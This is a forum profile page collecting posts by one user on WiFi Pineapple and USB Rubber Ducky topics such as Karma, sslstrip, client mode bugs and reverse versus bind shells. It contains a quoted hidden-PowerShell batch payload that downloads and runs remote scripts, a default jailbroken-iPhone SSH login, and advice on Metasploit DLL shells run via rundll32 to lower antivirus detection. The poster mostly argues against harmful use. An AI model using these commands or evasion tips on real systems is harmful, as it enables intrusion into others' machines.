Xcellerator
-
Posts
285 -
Joined
-
Last visited
-
Days Won
10
Posts posted by Xcellerator
-
-
Well, according to "Down for everyone or just me", the url doesn't exist. http://www.downforeveryoneorjustme.com/www.islayer.com
Sslstrip *should* be able to handle that just fine, so I'm not sure why the logs freaked out like that.
Maybe try disabling Karma and keep sslstrip running. Then try and browse to "www.islayer.com" or any other site that doesn't exist. If it happens again, it should be reported as a bug.
UPDATE: After Googling "islayer" it appears that it was software for Hackintoshes (non-apple computers running hacked versions of OS X) that is no longer available. The device that connected could have been a hackintosh that automatically checked for updates and queried the URL in an odd way that sslstrip didn't like?
-
It says that the DNS Lookup failed. Are you connected to the internet via the Pineapple in Client Mode on wlan1?
On seconds, it appears that the address "www.islayer.com" doesn't actually exist? What were you doing browsing wise when you got this error?
If it wasn't you, do you know who or what was connected (possibly through Karma) that made the DNS request?
-
This is the same thing i've been wondering, infact, if someone could develop some infusion that we would be able to use as post-exploitation that could copy their preconfigured password files from their device. Just a thought!!
Not gonna happen, I'm afraid. You'd need to be able to get root access to the device remotely. That in itself is pretty unlikely!
*IF* you were able to get SSH access to the device (funnily enough is still pretty common on jailbroken iPhones, try root:alpine) then you can SCP out anything you like. On Androids, people tend to be a lot more tech-savvy and lock down their SSH or at least change the default password. It's not as simple as just 'copying out their preconfigured password files'.
The apps are pretty darn secure, and you're not gonna be able to just sniff out the logins because they remain authenticated unless the app is force-closed. Even if the internet connection is lost or the server is unavailable, they still won't attempt to re-authenticate. You'd have to be pretty damn lucky to grab a login from an app.
Maybe they use something a little more advanced now that cannot be downgraded to a lower form of encryption. I hear that SSL/TLS is supposed to be a better version of HTTPS.
As far as I know, SSL/TLS can't be downgraded to HTTPS/SSL 2.0, so yeah sslstrip isn't gonna work. It's actually surprising that sslstrip has remained working this long!
-
Technically, its the same process. But putting wlan1 in monitor mode is preferred because its the 'free' card and is also the 'better' card (RTL8187).
wlan0 is the Atheros card and will typically be in managed mode and act as an AP.
-
The wiki is your friend! ;)
-
That last section is not entirely correct. Lots of OSs are still attackable if they are not currently associated. Others have other weaknesses which we will be making use of soon. OSX Maverick devices just love being Karma'd etc.
Really? That's interesting! Will there be a detailed breakdown of what those weaknesses are along with the eventual update? It'll be interesting to read about..
-
Its actually harder than it sounds. Even if you cut off the connection to Facebook or Twitter, you wouldn't sign them out. Try putting your phone in airplane mode then open Facebook, it just says "no connection".
Even forwarding requests from ""http://www.facebook.com/logout.php" won't work, you just get redirected to "/home.php". I guess its down to either come kind of cookie or session type thing or maybe some PHP voodoo.
Haven't actually checked on my own Pineapple, but is there a way to do session hijacking? Would probably be the closest to what you're after.
Surprisingly, sites like Facebook and Twitter are actually pretty good at keeping user details tied up little bows so nasty hackers can't get to them..
-
The wiki is your friend. http://wiki.wifipineapple.com/index.php/Karma
Read the last section.
What devices are you trying to hijack using Karma? It will help to see if its a bug or just the way that karma works.
-
Even then, some crypters actually INCREASE the likelihood of detection due to the fact that the engine has to be in the stub somewhere so that the code can be decrypted at runtime.
That's why there are lots of EXE encryption engines, but only a few are actually used by the majority.
-
It depends on what you're trying to get past the AV. Antivirus works in lots of ways, for instance a 'file shield' works by detecting known signatures within files that are being transferred to the hard disk. Many AV also have firewalls, web page scanners, email client scanners, and some even have P2P network shields.
It would help to know what it is your trying achieve, is it just executing a binary on a remote host?
-
The name you set in Karma configuration is the SSID given to wlan0. Before it would have been "Pineapple5_<last two octets of MAC address>"..
You might aswell set it to something inconspicuous like "NETGEAR" or "linksys"..
-
It's not hardware based as the hardware itself can't change. As far as hardware is concerned (for WiFi anyway) is very simple physics and only works in the way they're built.
However, its all down to the software used to interface the hardware. Developers patch up their OS to avoid broadcasting requests while connected to a network. For this reason, you'll find devices fit into three categories.
1. Karma works as it always had (getting rare, usually old phones that people don't bother updating)
2. Karma works intermittently (only broadcasts requests when not connected, i.e searching for a known SSID)
3. Karma doesn't work at all
You should try sending out deauth packets to disconnect a client and then see if Karma works (meaning its in category 2)
-
SkyDrive is good. I know you used to be able to use GoogleDrive, but not 100% sure if you still can. 9/10 I just host the file myself and get the script to connect back to me - usually its a shell anyway, so I'm on the network..
If they're just scripts, then pastebin takes care of everything.
-
Yeah, Karma doesn't really work on anything newer than ~2012.. Theoretically it's possible to get it working again, and this has been hinted at by the Devs, but very little has actually been said.
Besides, Karma is by no means the main selling point of the Pineapple anymore, the project has expanded to be much more.
-
You cannot just grab direct download links from mediafire.
You agree, while using MediaFire Services, that you may not: . . . Use any robot, spider, offline readers, site search and/or retrieval application, or other device to retrieve or index any portion of the Services, with the exception of public search engines;
from: http://www.mediafire.com/policies/terms_of_service.php
-
What payloads have you been trying? Post the scripts, also what OS are you testing against?
-
I'd recommend using the metasploit framework. I make all my shells through it. It's better than using the same exe every time cos you can add encoding options and even run the whole connection over https rather than tcp.
Seeing as your using the ducky, I'd recommend generating a dll rather than an exe - much lower AV detection rate.
Run a dll using this:
rundll32.exe file.dll, @DllMain12
-
What you're asking for is a bind shell rather than a reverse shell.
A bind shell works by the target computer literally binding their shell to a port that you connect to.
A reverse shell works by the target computer connecting you to over a port and then providing the shell.
Both have the same effect but achieve it in very different ways.
-
Sorry about the preschool remark. I know media fire doesn't allow direct links. I got it by right clicking the download button, selecting inspect element, and finding the link that the button lead you to. I've tested it on another computer and it's worked.
Well, the machines I've tested on (powershell in windows, and wget in linux) both just downloaded a web page. What version of windows did you test on? Can you post a screenshot of the download being successful? As in the powershell command (without the hidden window style bit) and then 'type' the bat file?
Can someone please post the code in a code box? I am in fear of downloading the thing, and accidentally running it, but I want to see it.
@echo off powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://download1505.mediafire.com/uqxpahdvmi5g/iqgb5774sqcyu7c/updater.vbs','C:\updater.vbs') powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://download1647.mediafire.com/dhhclv61cblg/gjnalpa67hvpb43/update.bat','C:\update.bat') powershell -windowstyle hidden Start-Process "C:\updater.vbs"This is what the initial bat file is when you download it through mediafire.
-
How about you try:
wget http://download1585.mediafire.com/3j2upgu7avbg/8runbhhu8fjrjah/Runner1.bat; cat Runner1.bat
and then tell me it works.
I see no reason for you to be offensive (the preschool remark), I've merely given my opinion that I think what you're doing is immoral and not in vein with what (the majority) of this community is about. I also pointed out an actual problem with your script (although I disagree with its purpose, I think that the execution is clever).
Mediafire don't allow direct downloads via links, they want you to go to their site and click the link manually which forwards you around some PHP (or ASP, whatever they use..) to serve up the download. It stops people mass downloading huge files from their servers and clogging up their bandwidth. A better idea would be stick it on pastebin and use the raw link they'll give you (seeing as it's essentially just text files your downloading).
I wrote a ducky script using this technique to add an open wifi network to a windows machine (to autoconnect to the pineapple)
You can see it here if you like: https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---Pineapple-Assocation-(VERY-FAST)
Backdoors can be used a demonstration of "hey look, in just a few seconds I installed this thing that lets me access all your stuff - you should really fix this so that someone doesn't come along and cause some real damage" - that's what I'd use it for anyway..
-
Then what's the point of having a ducky if you are using it for "demonstration"? I payed 50 dollars for something that makes me laugh, not "demonstrate".
By all means, demonstrate to a person or corporation the risks posed by physical security, but what you're proposing is just causing unnecessary harm and wasting the time of other people. Dunno about you, but I see hacking as way of furthering my own understanding and fixing holes in security - not deliberately using my own knowledge to harm or annoy others.
Also, you obviously haven't tested your script - the download points to mediafire. Try wgetting that, all you get is a html page..
Don't want to really take sides here, but we should all bear in mind that the USB rubber ducky is first and foremost a script running tool. If we are going to draw lines here, we should bear in mind that even some of the payloads like mine are merely batch and powershell scripts.
I understand where you're coming from, and there's nothing wrong with payloads that download and run scripts. Its what the script does that's the problem. Changing someones wallpaper or planting a backdoor isn't anything like causing popups every minute - and they're persistent after reboot..
-
Generally, if possible, I try and get a bit of info about the machine first. I take a look at the keyboard they're using, (Dell, Microsoft, etc) and try and go from there. Doesn't always work, but most of the time I can bypass the whole driver installation business.
-
This is just malicious and all it would do is take up some poor admins time to fix it.
Spreading across a network just exacerbates the problem.
Teach people about physical security by demontration, not causing harm to them or interrupting their work flow - that doesn't help anyone.
-
Good to hear! Looking forward to the update!
The Task: Fix Client Mode for everyone
in WiFi Pineapple Mark V
Posted · Edited by Xcellerator
Alright! I'll start off this train, then!
I'm using WPA2-Personal with AES.
Here is the output of iwlist:
Only my AP is shown and I've hidden the MAC Address.
In the Pineapple interface, it displays my AP as having the right encryption.
However, when I type iwconfig, it claims that wlan1 is connected in managed mode to my SSID, although I get no replies from any ping requests and refreshing the network tab still shows "Wlan1 IP: n/a". This always happens after a reboot (complete power cycle).
If I connect again through the web interface, "Connecting, please wait" spins indefinitely and doesn't ever stop. If I exit the page manually and refresh the network tab, it confirms I have an network IP address from my AP, and I get replies to ping requests.
In other words, I can get Client Mode to work, but its buggy to get it running.